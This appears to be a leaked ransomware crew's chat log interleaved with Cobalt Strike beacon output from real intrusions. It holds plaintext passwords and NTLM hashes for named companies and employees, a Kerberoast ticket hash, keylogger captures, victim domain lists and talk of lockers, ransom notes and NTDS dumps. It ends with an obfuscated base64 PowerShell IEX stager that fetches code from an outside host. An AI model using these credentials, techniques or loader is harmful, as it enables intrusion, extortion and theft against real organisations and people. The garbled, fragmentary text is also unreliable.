WARNING: No Exchange servers are available in the Active Directory site Ohio. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site WI. Connecting to an Exchange server in another
 Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Henderson. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Nevada. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Poland. Connecting to an Exchange server in
Another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Suzhou. Connecting to an Exchange server in
WARNING: Connecting to an Exchange server in another Active Directory site.
VERBOSE: Connecting to Exchange.rtpco.local.
``````
Username : arobinsona
Domain : RTPCO
Password : Passw0rd!

Username : O365Service
Domain : RTPCO
Password : Password1!
``If we've done our best, why wait for him to write ``.
 Trend breaks the locker, not the note, but now it also breaks the tht, that's why it doesn't leave a note
it's better to wait for mana

``I'm not sure if it's all encrypted there, so unscramble it and fuck with their heads.)
Or make a file with a different name and content slightly tampered with.What about the note if the locker worked ok? mostly kerbs no attention or 1-2 networks maxrode nigdea tell me where the NTDS dumped there ``
bigassfans.com fishusa.com healthcare.com mgrmedu.com telecomlabsinc.com
bnpmedia.com forestriverinc.com holzerford.com netease.com unf.edu
cpcc.edu globaltranz.com humboldt.edu oasispetroleum.com vpinc.net
desire2learn.com gpj.com mapciasp.com orenco.com zohocorp
epcusa.com happay.in matchesfashion.com snpartners.com

I can't find my build on my hardcodile triad just psh doesn't work) there's a guy who "rules" it out there
and please give me a .net shairfinder will you take it? i'll brougt the vpnotscan sabiki find adr? ok i'll give all vpnos to work for it already
there's one on backdoor
triadmetals
alloypolimers
ballymoregroup
how much? they said you have the grids? tomorrow's boot? yes please clean out the dead sessions there yes? no need, i already ordered it, i just want to test it today on some and this one will do fine1 i can give you a fresh one i ordered 3 for the boot i can give you the old one, it's the one wilson lochy
you ordered a new one for you already the old one? cause the old one) i thought you flooded it aaa ok give it to @user4 i can work on it? you do not use this server? 104.194.10.161ARCHIVE.loomisco.com yes, extended, please```
loomisco.com\EDIADMIN:APPSYS
loomisco.comShutdown:p3bk@c1
loomisco.com/Omiller:Angela327!
``I'll write a full report with commands or only the steps? Immediately report as found@tl1 @tl2Keach such error reduces the number of remaining authorization attempts before the account is blocked.
ERROR: Logon failure: unknown user name or bad password.
``````
beacon> net share
[*] Tasked beacon to run net share on localhost
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \localhost:

 Share name Comment
 ---------- -------
 ADMIN$ Remote Admin
 C$ Default share
 F$ Default share
 IPC$ Remote IPC
 Scan_Data

``````
beacon> net logons
[*] Tasked beacon to run net logons on localhost
[+] host called home, sent: 104506 bytes
[+] received output:
Logged on users at \localhost:
[+] received output:
Loomisco\Backupuser
SCANSTORAGE\Backupuser
Loomisco\Backupuser
LOOMIS\SCANSTORAGE$
``loomisco.com
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
loomisco.com
``````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:78fe7f8e8140a38ea3886cccd4cb0a19:::p3bk@c1
````Loomisco\Backupuser ASdnmxcsdf@#d````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:78fe7f8e8140a38ea3886cccd4cb0a19:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SophosSAUSCANSTORaaa:1005:aad3b435b51404eeaad3b435b51404ee:546026a5bc5721ea345185056d7e21c1:::
``````
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 TLCDC1 192.168.0.192
 TLCDC2 192.168.0.222
``user9files won't fly (sextg@tl1``)
CORP\jvelazquezg 956e44f5069e8f0161ea7064840894ff
CORP\Rflores 3e33c0155d517e77ad1a4040c9ed4e45
CORP\lvegar 06ca20732bea98870c93d29a2b31e783
FILIAL\Anavarretea 5cb20c880326791e424fc9f2554ae9b4
CORP\evazquezpr 288c03a4543cf46d0a665df89f1b8a3d
```
I managed to get the hashes down.
Teemo[SFE18491]Hgutierreze/792560|2021Jan28 20:51:16> shell tasklist /v /s CORPKIOVDAPGM01.corp.televisa.com.mx
[*] tasked beacon to run: tasklist /v /s CORPKIOVDAPGM01.corp.televisa.com.mx
[+] host called home, sent: 82 bytes
Nombre de imagen PID Nombre de sesión Núm. de ses Uso de memor Nombre de usuario Tiempo de CP
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 4 KB NT AUTHORITY\SYSTEM 1600:47:50
System 4 Services 0 256 KB N/D 3:39:06
smss.exe 1340 Services 0 1,052 KB NT AUTHORITY\SYSTEM 0:00:01
csrss.exe 1452 Services 0 4,724 KB NT AUTHORITY\SYSTEM 0:00:42
wininit.exe 1524 Services 0 4,152 KB NT AUTHORITY\SYSTEM 0:00:00
services.exe 1616 Services 0 14,012 KB NT AUTHORITY\SYSTEM 0:02:46
lsass.exe 1660 Services 0 60,944 KB NT AUTHORITY\SYSTEM 0:27:11
svchost.exe 1752 Services 0 22,616 KB NT AUTHORITY\SYSTEM 0:06:03
svchost.exe 1784 Services 0 14,632 KB NT AUTHORITY\NETWORK SERVICE 0:03:50
svchost.exe 1900 Services 0 25,576 KB NT AUTHORITY\LOCAL SERVICE 3:10:52
svchost.exe 1916 Services 0 91,696 KB NT AUTHORITY\SYSTEM 2:50:25
svchost.exe 1940 Services 0 18,528 KB NT AUTHORITY\LOCAL SERVICE 0:01:21
Citrix.Wem.Agent.Service.     1996 Services 0 135,548 KB NT AUTHORITY\SYSTEM 0:12:47
svchost.exe 1412 Services 0 73,540 KB NT AUTHORITY\SYSTEM 3:24:01
Citrix.Wem.Agent.LogonSer 1188 Services 0 26,320 KB NT AUTHORITY\SYSTEM 0:00:02
svchost.exe 1608 Services 0 23,080 KB NT AUTHORITY\NETWORK SERVICE 0:10:18
CtxPvDSvc.exe 1180 Services 0 7,976 KB NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1404 Services 0 28,256 KB NT AUTHORITY\SYSTEM 0:00:34
UserProfileManager.exe 2068 Services 0 15,532 KB NT AUTHORITY\SYSTEM 0:05:52
svchost.exe 2184 Services 0 9,100 KB NT AUTHORITY\LOCAL SERVICE 0:00:05
svchost.exe 2236 Services 0 16,064 KB NT AUTHORITY\LOCAL SERVICE 0:00:21
PvsVmAgent.exe 2268 Services 0 6,068 KB NT AUTHORITY\SYSTEM 0:00:00
BNDevice.exe 2388 Services 0 11,816 KB NT AUTHORITY\SYSTEM 0:00:00
spoolsv.exe 2544 Services 0 77,740 KB NT AUTHORITY\SYSTEM 0:39:24
armsvc.exe 2584 Services 0 6,768 KB NT AUTHORITY\SYSTEM 0:00:00
BrokerAgent.exe 2712 Services 0 136,640 KB NT AUTHORITY\NETWORK SERVICE 0:15:24
CdfSvc.exe 2820 Services 0 7,636 KB NT AUTHORITY\NETWORK SERVICE 0:00:00
encsvc.exe 2860 Services 0 6,972 KB NT AUTHORITY\LOCAL SERVICE 0:39:29
CseEngine.exe 2948 Services 0 1,081,368 KB NT AUTHORITY\SYSTEM 4:51:34
ctxrdr.exe 3004 Services 0 7,360 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
CtxCeipSvc.exe 2064 Services 0 8,804 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
CpSvc.exe 2156 Services 0 35,064 KB NT AUTHORITY\LOCAL SERVICE 0:17:06
CtxAppVService.exe 2464 Services 0 45,288 KB NT AUTHORITY\SYSTEM 0:00:00
CtxSvcHost.exe 2428 Services 0 9,856 KB NT AUTHORITY\LOCAL SERVICE 0:00:04
CtxSvcHost.exe 2684 Services 0 8,204 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
WebSocketService.exe 532 Services 0 9,924 KB NT AUTHORITY\SYSTEM 0:00:01
CtxSvcHost.exe 1016 Services 0 8,096 KB NT AUTHORITY\LOCAL SERVICE 0:00:01
CtxSvcHost.exe 912 Services 0 7,536 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
CtxSvcHost.exe 392 Services 0 12,740 KB NT AUTHORITY\LOCAL SERVICE 0:00:42
macmnsvc.exe 988 Services 0 12,816 KB NT AUTHORITY\LOCAL SERVICE 0:00:13
masvc.exe 1128 Services 0 28,904 KB NT AUTHORITY\LOCAL SERVICE 0:03:42
CtxSvcHost.exe 2764 Services 0 7,372 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
SCService64.exe 2656 Services 0 23,728 KB NT AUTHORITY\NETWORK SERVICE 0:00:17
svchost.exe 2516 Services 0 40,968 KB NT AUTHORITY\NETWORK SERVICE 0:48:48
SemsService.exe 2872 Services 0 39,660 KB NT AUTHORITY\LOCAL SERVICE 0:02:54
ImaAdvanceSrv64.exe 3192 Services 0 8,708 KB NT AUTHORITY\SYSTEM 0:00:18
macompatsvc.exe 3968 Services 0 15,224 KB NT AUTHORITY\SYSTEM 0:00:12
mfemactl.exe 3164 Services 0 8,196 KB NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2844 Services 0 11,260 KB NT AUTHORITY\SYSTEM 0:01:11
svchost.exe 4108 Services 0 7,728 KB NT AUTHORITY\NETWORK SERVICE 0:00:02
TelemetryService.exe 3092 Services 0 69,936 KB NT SERVICE\CitrixTelemetryService 0:00:08
AotListener.exe 2040 Services 0 25,312 KB NT SERVICE\CitrixTelemetryService 0:00:00
conhost.exe 4584 Services 0 6,008 KB NT SERVICE\CitrixTelemetryService 0:00:00
VSSVC.exe 3892 Services 0 9,224 KB NT AUTHORITY\SYSTEM 0:00:00
msdtc.exe 3720 Services 0 9,652 KB NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 2932 Services 0 6,780 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
mctelsvc.exe 428 Services 0 15,404 KB NT AUTHORITY\SYSTEM 0:00:03
CloudamizeWatchdog.exe 4036 Services 0 44,692 KB NT AUTHORITY\SYSTEM 0:01:43
csrss.exe 4132 Console 2 3,928 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 2172 Console 2 10,192 KB NT AUTHORITY\SYSTEM 0:00:00
logonUI.exe 2452 Console 2 28,604 KB NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 3076 Console 2 27,300 KB Window Manager\DWM-2 0:00:00
WmiPrvSE.exe 13236 Services 0 36,596 KB NT AUTHORITY\SYSTEM 0:58:13
WmiPrvSE.exe 1288 Services 0 24,688 KB NT AUTHORITY\LOCAL SERVICE 0:01:42
WmiPrvSE.exe 11844 Services 0 12,904 KB NT AUTHORITY\NETWORK SERVICE 0:02:52
csrss.exe 10104 ICA-CGP#13 108 12,360 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 12108 ICA-CGP#13 108 13,176 KB NT AUTHORITY\SYSTEM 0:00:06
dwm.exe 11816 ICA-CGP#13 108 38,720 KB Window Manager\DWM-108 0:00:01
ctxgfx.exe 8400 ICA-CGP#13 108 26,860 KB NT AUTHORITY\SYSTEM 0:00:01
taskhostex.exe 10436 ICA-CGP#13 108 9,088 KB CORP\jvelazquezg 0:00:00
icak2meng.exe 12952 ICA-CGP#13 108 7,344 KB NT AUTHORITY\SYSTEM 0:00:00
wfshell.exe 9128 ICA-CGP#13 108 21,312 KB CORP\jvelazquezg 0:00:00
CtxMtHost.exe 8132 ICA-CGP#13 108 8,584 KB CORP\jvelazquezg 0:00:00
SptEddss.exe 4080 ICA-CGP#13 108 38,776 KB CORP\jvelazquezg 0:00:14
DirectorComServer.exe 12256 ICA-CGP#13 108 21,836 KB CORP\jvelazquezg 0:00:00
csrss.exe 10924 ICA-CGP#14 120 8,728 KB NT AUTHORITY\SYSTEM 0:00:03
winlogon.exe 12836 ICA-CGP#14 120 13,232 KB NT AUTHORITY\SYSTEM 0:00:01
dwm.exe 1860 ICA-CGP#14 120 37,976 KB Window Manager\DWM-120 0:00:02
ctxgfx.exe 9544 ICA-CGP#14 120 46,704 KB NT AUTHORITY\SYSTEM 0:00:06
icak2meng.exe 8960 ICA-CGP#14 120 7,344 KB NT AUTHORITY\SYSTEM 0:00:00
taskhostex.exe 2036 ICA-CGP#14 120 9,016 KB CORP\lvegar 0:00:00
wfshell.exe 13040 ICA-CGP#14 120 20,920 KB CORP\lvegar 0:00:00
DirectorComServer.exe 13264 ICA-CGP#14 120 21,900 KB CORP\lvegar 0:00:00
CtxMtHost.exe 9096 ICA-CGP#14 120 8,576 KB CORP\lvegar 0:00:00
PgmCtl32.exe 1720 ICA-CGP#14 120 71,376 KB CORP\lvegar 0:01:56
TitleMan.exe 12948 ICA-CGP#14 120 33,388 KB CORP\lvegar 0:00:01
WmiPrvSE.exe 11700 Services 0 13,344 KB NT AUTHORITY\NETWORK SERVICE 0:00:05
csrss.exe 580 ICA-CGP#113 77 8,312 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 4428 ICA-CGP#113 77 13,208 KB NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 3736 ICA-CGP#113 77 29,288 KB Window Manager\DWM-77 0:00:00
ctxgfx.exe 9272 ICA-CGP#113 77 26,384 KB NT AUTHORITY\SYSTEM 0:00:00
icak2meng.exe 12472 ICA-CGP#113 77 7,300 KB NT AUTHORITY\SYSTEM 0:00:00
wfshell.exe 12764 ICA-CGP#113 77 21,344 KB FILIAL\Anavarretea 0:00:00
CtxMtHost.exe 600 ICA-CGP#113 77 8,580 KB FILIAL\Anavarretea 0:00:00
Accounts.exe 3824 ICA-CGP#113 77 32,612 KB FILIAL\Anavarretea 0:00:13
taskhostex.exe 12336 ICA-CGP#113 77 8,968 KB FILIAL\Anavarretea 0:00:00
DirectorComServer.exe 6428 ICA-CGP#113 77 21,860 KB FILIAL\Anavarretea 0:00:00
csrss.exe 9464 ICA-CGP#115 38 8,640 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 5088 ICA-CGP#115 38 13,196 KB NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 9640 ICA-CGP#115 38 29,636 KB Window Manager\DWM-38 0:00:00
ctxgfx.exe 456 ICA-CGP#115 38 35,472 KB NT AUTHORITY\SYSTEM 0:00:00
icak2meng.exe 10760 ICA-CGP#115 38 7,332 KB NT AUTHORITY\SYSTEM 0:00:00
taskhostex.exe 9872 ICA-CGP#115 38 8,988 KB CORP\pbsilvalo 0:00:00
wfshell.exe 6504 ICA-CGP#115 38 20,820 KB CORP\pbsilvalo 0:00:00
CtxMtHost.exe 8168 ICA-CGP#115 38 8,588 KB CORP\pbsilvalo 0:00:00
PgmCtl32.exe 8600 ICA-CGP#115 38 66,664 KB CORP\pbsilvalo 0:00:10
DirectorComServer.exe 4588 ICA-CGP#115 38 21,900 KB CORP\pbsilvalo 0:00:00
TitleMan.exe 11740 ICA-CGP#115 38 33,332 KB CORP\pbsilvalo 0:00:01
SptEddss.exe 9260 ICA-CGP#13 108 35,328 KB CORP\jvelazquezg 0:00:05
rundll32.exe 7884 Services 0 11,312 KB NT AUTHORITY\SYSTEM 0:00:00
rundll32.exe 5968 Services 0 11,336 KB NT AUTHORITY\SYSTEM 0:00:00
powershell.exe 10816 Services 0 91,076 KB NT AUTHORITY\SYSTEM 0:00:01
conhost.exe 12992 Services 0 6,172 KB NT AUTHORITY\SYSTEM 0:00:00
powershell.exe 10928 Services 0 52,624 KB NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 4548 Services 0 5,940 KB NT AUTHORITY\SYSTEM 0:00:00

```
something does not draw the car@user7 then work here ``
User : NT AUTHORITY\SYSTEM
Window : Conexión - Internet Explorer
Time : 2021-01-28 09:36:38 a. m.
LogFile : WireTap.log
----------------------------------------------
hgutie<Tab>
[+] received output:
73HILArioge=<Enter>
Just like a peep in the eye.
TrGUI
=======
R8WTksIOle1rP8)P
253758
```
vpn``.
 202B fil 09/23/2020 16:25:07 pas.txt
 903.2KB fil 09/21/2020 14:59:51 seatinfo.txt
```
and files left)I won't repeat any more where the hashtag format ```
[*] Tasked beacon to psinject: invoke-kerberoast | fl into 508 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:


TicketByteHexStream :
Hash : $krb5tgs$host/STS.GPJ.COM:922009E476DEA5700F2E695715EB812D$BBDE017D99D5497CE
                       797629897A1BB4D09635DFB86D65E6160D4621FBA14E553D40768D8BA73B20B3F05D38D6923B
                       EECFC23FEDCEE7912A886169F781DD5B971C84C7257CC762FC68DC441B223CEDC016A618C77C
                       945CB23E574F4702C3702B6E0084402019F26DB11FCFFDECE625BEAA8E0086A58C51908C3A3F
                       AE656EC95B9AF00A9DBF850490CADDAEE02909EF657CA8F5E0C255D1C79692241553BA8E34A6
                       B37338A20514096F85E4D17D1A9A89CDA43E330FDC148F0725E09FCD6DE661825F314453418D
                       18727C89D113CDF8947072CF4C7CC9850070DC0FC7D4F8B5F13AB16151ADB36DA6BB761D5A78
                       43608AD6D5EB683D03AE6F2B29849FF8FC9AC0472CB4F51BE206FF7BAC9AA67F4ACB438C0149
                       332A88A39AB66541EE018FCF4F0859A69C07FD06A7D0FC3B736D393575ACF1B1548E4EF03C11
                       6C0BD49F66561D08B251D999ACC8AD7B087A818A2B329A83EBF9FE912D6C04D25E7B2DE93709
                       0B10D3DCAC2B606265939967B1164EC63CD582B5F71128DF194A57C750015691F6AB7A5481C1
                       75033CF61337046E2B253A55A92F21D5A444BE94657FD25DBE868ABFBCD9F2E70DAAD7814D18
                       49CDEE2EAC0BFF9E4748C3976AF7B573C97F269F84C400605591CD357FB76BF94D2301DB76A4
                       8612FCCE2C1D0B11F68481B741CBB52B55F4A6F6C4F3DE454E19A4AE41E31E5032940C1C6119
                       0A0582C179633B1AF2261148D439A356710E33CE603FEC87770775FD1060F0A5DBC510598AC2
                       344ACFCC2ED05AFA1BAF861A14B18ADABE70DBA7AD73A51EEF91273ADFE6CFBC21823F38B9C6
                       22E1066884E74A5BA7012FF4F4CE1BFF4CAC6B9C032B8B2758232528F584D95E9B6CA0730F35
                       2780FCDB09E30769F6F7CBD101EAC32AC1FB6F544B2F85D54CE397F8FE8C664ADE59F8887E09
                       7FF9B57FFEADFCEF80BE932707EC1B5251D3222B22AFEB43F3ACD3F1AA42B9E267AC8EF62FD1
                       183DC38BD0570F7E70E4E2A7BFA3467FE79257156B34B952843BB9A4C7ED04ED2053DA281010
                       FAFD17BAE5C73DE59C3B1A63A6AF7B55C826278E1FEDB1EEABE7B13F4AC8D23A44135E98534E
                       49DC204D5EE45C8B29E74F1B94FE37F64DD0C08D7E60C1688859024754E8BD7B25ED523AE177
                       3FB86C6FDEF53C34D302E3E95E7F338B1169AA7CC20791AC2C678D2F407C9821F2B0C028D3F0
                       2F5CF63EED2F9906B1EEFD7B068873DB53C7D02CFB58DB64B13A2F67FD37F5601965243564D8
                       390D00BA481B5CB599DBF95D0BC34A60BCBA0914378F308F170A4C205C3EE62B0A2F0ED098C1
                       94C7E03129D489261CE4472666798914D2E04040FD1BE0D3FA173609AEB28B5C521BCD10F36D
                       A9CED3A0730C1351435C8C0940F6206BE432CC772B3CB8B8DFE91129D41A9324496BE689DBB0
                       3564AC936542D1B52B9B6D8C93113AB54BFFE0FCF353E49A6E09E0A479F85449A362C698FA9B
                       C847F4B395ECEDCC68046229877571B8CCA6CF3C681E8A570BE696722AB590B91A4B46599FD2
                       32AE2ACDF9272E3D64CD8ADF4DA0BF6FA411945145FB061C4BF72136CF970453A93D09CFBEDE
                       7EDB8266750800A178D6B604C05A1900EB599D176276BB02CACA86E54BB74A0955C7D7663A40
                       806069F1E62DFB33ED8F254F8618A23113FA409F6366CD94EBB9DB444F80D1C1C94E8777E2E8
                       23CD8DCEDDD31579B4D5DDA2A120B2E14E83351428CB6C431D726FC28CAA8C0686C57D919950
                       48EFD911A7C98DF81B9F2C47062E3C1BF14F183CD1ECD1CCBA97AB143BE8D1A86F7F0F809A38
                       E9BC6F2BC612FFDDC845053FCFABE6F482214E57AD7FEE71960B84BCCD41BB5950D2C967E3DE
                       F10AEFF3C5FEB106CE5B19C4DCCA7E5FE148B0879CBAF5A5828592D82F8C09AE54E9005C92A9
                       677FA59B87EB3E9FF753CFB6EF022E272B1B064090A9AF0DD281A332AA5AB21E3B01024840D0
                       87C912B42B869198FB579E81CF8FF8E6F
SamAccountName : Pwwadfssvc
DistinguishedName : CN=PwwAdfs Svc,OU=Users,OU=AuthManagement,DC=gpj,DC=loc
ServicePrincipalName : host/STS.GPJ.COM

``````
[RESULT] Username: Administrator (built-in)
[RESULT] Changed: 2015-06-29 09:18:32
[RESULT] Password: DdhGmek/pc
[RESULT] Username: install
[RESULT] Changed: 2015-06-29 09:46:46
[RESULT] Password: rt/98740/pc
[RESULT] Username: Lack
[RESULT] Changed: 2014-10-06 09:45:54
[RESULT] Password: RT+farbe

if there is time to work with the nessession arrived)ah, then delete all but one dead ones with a ping in a few hoursdid you have dead ones if there are[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=XSDfk8yFdwtBYX9dF) ?with you what happens to mine?ok, go back to the other 14 tasks closed without a note? great) in the root of the rdmi appeared) ok if there will be rdmi then ok try to run dlla 17 will not work? ok take a secondary server with a session to 15 makstam so much? if more than 10 is ok? all mapping or whatever? no i just picked up disks ts. I'll check if the balls are done? + in short, I'll work in a shared coba, maybe delete 50 units? it seems that I have a problem with the coba. ran dll from a user7 to him the session flew. he tried to throw it to me - no luck. then he threw it in the coba, where we are now taking the session. I tried to dump it on myself - again no luck. I restarted cobalt at 7 o'clock. I'll try the others. I went in order and stopped at the first one and masked the rest.no use, llvm and both checkboxes checked - no session anyway, i made a dll in bilder, it copied, i ran it, it disappeared, but no session...i'll give you access to bilderado dll maybe better, mine will not raise sessionokeid.bild left? ok, let's do[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=3wWnzihjHwbAKDKm7) maybe it is. stalin says "hz" ``
Volume in drive \10.0.61.17\c$ has no label.
 Volume Serial Number is F476-EA6A

 Directory of \10.0.61.17\c$

08/22/2013 08:52 AM <DIR> PerfLogs
12/08/2020 05:22 PM 204,192 pl64.dll
03/29/2019 01:30 PM <DIR> Program Files
12/09/2020 07:42 AM <DIR> Program Files (x86)
12/09/2020 08:06 AM 42,606,592 redcloak.msi
03/06/2015 10:26 AM <DIR> sysprep
06/13/2019 02:08 PM <DIR> Users
07/25/2020 07:12 PM <DIR> Windows
10/26/2018 12:36 PM <DIR> Zabbix_Agent
``but I don't see a note in these, ok, the dll could have stayed since the sessions were from a process and the dll can't be killed```
 Volume in drive \10.0.61.87\c$ has no label.
 Volume Serial Number is 6847-A1AE

 Directory of \10.0.61.87\c$

09/14/2012 12:22 PM 5,210,976 445622_intl_x64_zip.exe
03/23/2016 01:35 PM 1,435,680 adksetup(1).exe
06/03/2011 12:54 PM 119 FIREWALL
12/10/2020 07:07 AM 0 KBSERVICE.SHUTDOWN
06/03/2011 01:10 PM 924,544 keyManagementServiceHost.exe
11/19/2014 04:57 PM 434,152 office2013volumelicensepack_x86_en-us.exe
07/13/2009 07:34 PM <DIR> PerfLogs
12/08/2020 05:37 PM 0 pl64.dll
03/29/2019 01:30 PM <DIR> Program Files
01/16/2018 04:10 PM <DIR> Program Files (x86)
05/21/2020 09:53 AM <DIR> Users
01/14/2019 11:33 AM <DIR> Win7AndW2K8R2-KB3191566-x64
12/08/2020 06:34 PM <DIR> Windows
07/02/2012 02:32 AM 5,084,750 Windows6.1-KB2691586-v9-x64.msu
10/21/2013 12:45 PM 7,769,979 Windows6.1-KB2885698-x64.msu
10/29/2018 02:49 PM <DIR> Zabbix_Agent
``````
 Directory of \10.0.50.71\c$

08/03/2017 01:19 PM <DIR> B5465 P639 Firmware
08/03/2017 01:18 PM 223,498,304 B5465 P639 Firmware.zip
11/03/2017 09:55 AM <DIR> batch
08/17/2017 01:43 PM <DIR> Canon_backups
09/12/2016 04:34 AM <DIR> logs
02/24/2018 06:04 AM <DIR> PerfLogs
12/08/2020 05:19 PM 204,192 pl64.dll
11/03/2017 09:58 AM <DIR> Printer_Exports
03/29/2019 01:29 PM <DIR> Program Files
12/09/2020 02:51 PM <DIR> Program Files (x86)
10/24/2016 07:12 AM <DIR> sysprep
10/05/2020 02:13 PM <DIR> Users
11/21/2020 08:29 PM <DIR> Windows
10/26/2018 08:11 AM <DIR> Zabbix_Agent
07/16/2018 01:39 AM 2,423 __PatchLink0026.cab
``````
 Volume in drive\10.0.61.117\c$ has no label.
 Volume Serial Number is D242-6D7F

 Directory of \10.0.61.117$

11/01/2016 10:32 AM 7,789,336 ControlNowAgentSetup.exe
09/12/2016 04:34 AM <DIR> Logs
05/28/2018 02:16 AM <DIR> PerfLogs
12/08/2020 05:18 PM 204,192 pl64.dll
03/29/2019 05:54 PM <DIR> Program Files
12/09/2020 10:18 AM <DIR> Program Files (x86)
12/09/2020 08:06 AM 42,606,592 redcloak.msi
10/26/2017 01:43 PM <DIR> sysprep
01/29/2019 04:13 PM <DIR> Users
11/22/2020 08:30 PM <DIR> Windows
10/26/2018 09:41 AM <DIR> Zabbix_Agent
               3 File(s) 50,600,120 bytes
               8 Dir(s) 82,381,557,760 bytes free
``at the root of....``
12/08/2020 05:01 PM 204,192 pl64.dll
``dll remained+either raised or not attracted. let me ask stalin - his server was ``SHAREP-WEB1: 10.0.61.53
 Volume in drive \10.0.61.53\c$ has no label.
 Volume Serial Number is F476-EA6A

 Directory of \10.0.61.53\c$

02/09/2015 11:34 AM <DIR> inetpub
08/22/2013 08:52 AM <DIR> PerfLogs
12/08/2020 05:01 PM 204,192 pl64.dll
03/29/2019 05:54 PM <DIR> Program Files
10/08/2019 10:19 AM <DIR> Program Files (x86)
02/11/2015 09:59 AM <DIR> root
02/05/2015 09:42 AM <DIR> sysprep
05/24/2017 01:29 PM <DIR> Users
07/26/2020 07:12 PM <DIR> Windows
               1 File(s) 204,192 bytes
               8 Dir(s) 68,786,823,168 bytes free
``[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=ufef3u2v4oequfuwE) ok[ ](https://mediaeveryone.com/group/1-done-sisd-net?msg=jukNHRbyzyYWcqAZ2) there's nothing on these servers at all, no ball or disk from all serversdid you get them all? and take them off in general \host\c$ I'll check this dir \\\host\c$\readme.txt >> report.txt returned files
10.0.53.58
""
10.0.51.45
""
10.0.254.22
""
10.0.53.57
""
10.0.53.54
""
10.0.61.54
""
10.0.53.53
""
10.0.53.56
""
10.0.61.86
```
there's no balloon here? and it's being reportered on the 174 servers nowgm, right now) run it under the admin and change the host in a loop or something like thatmake a batkin with a loop in it
dir \\host\\c$/readme.txt >> report.txt If you manually go through 200 servers you'll get boredFINIIS1 - pings on nothing opensMANITOU - note thereADMINDC5 - note thereADM-RADIUS1 - note thereESPAPP3 - does not respond `` ``
The request will be processed at a domain controller for domain main.crispregional.org.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator Allscripts_Admin allscripts_services
AllscriptsSQL amhs-admin ashleys
blove dragon helpdesk
htservice jwashburn1 MBAM-RW-SVC
meditech meditech-admin mhiers
nodom pbodrey rlagrone
rthomas smaxwell spf_svcs
tcoppedge
The command completed successfully.


[+] received output:
The request will be processed at a domain controller for domain main.crispregional.org.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator rthomas
The command completed successfully.


[+] received output:
The request will be processed at a domain controller for domain main.crispregional.org.

Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
braccosupport
Domain Admins
meditech
meditech-admin

The command completed successfully.


beacon> shell net localgroup "administrators"
[*] Tasked beacon to run: net localgroup "administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
admin
Administrator
MAIN\Domain Admins
The command completed successfully.

``Then throw the actual information in the confab, so that everything was in front of my eyes, no, not yet? Yes, I'm still doping armas. So we'll start soon. So what.octamovemovement wentprinjoin @user8 still, still quietly put ``
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JENsemx0NFpld2U2bXI0ZTJMRTlkdzllRUNFSkhiUmxZY0NFPTA7CiRfaWQ9J1IzUFgzMmNkVmNIRE1IODd2MzBURWRXallaQTl2SzhWVlJpUjN6dVUnOwokX3VybD0naHR0cDovL3dpZGVpby5jb20vYXNzZXRzL2Nzcy9ib290c3RyYXAubWluLmNzcyc7CnNsZWVwIDEyOwokc3N3ID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuU3RvcHdhdGNoOwokZWMgPSAkZXJyb3IuY291bnQ7CmZ1bmN0aW9uIGI2NGUgKCRzdHIpIHtpZiAoISRzdHIpIHsgJHN0ciA9ICcnIH07cmV0dXJuIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkc3RyKSk7fQpmdW5jdGlvbiBiNjRkICgkc3RyKSB7cmV0dXJuIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHN0cikpfQpmdW5jdGlvbiBzcHIoJGEsICRwcykgewokV0MgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50Owokd2MuSGVhZGVycy5BZGQoJ2FsdC1zdmMnLCAibWE9JChHZXQtUmFuZG9tIC1NaW5pbXVtIC05ODc2NTQzIC1NYXhpbXVtIDk4NzY1NDMpLGgxLVEkKEdldC1SYW5kb20gLU1pbmltdW0gMTAwIC1NYX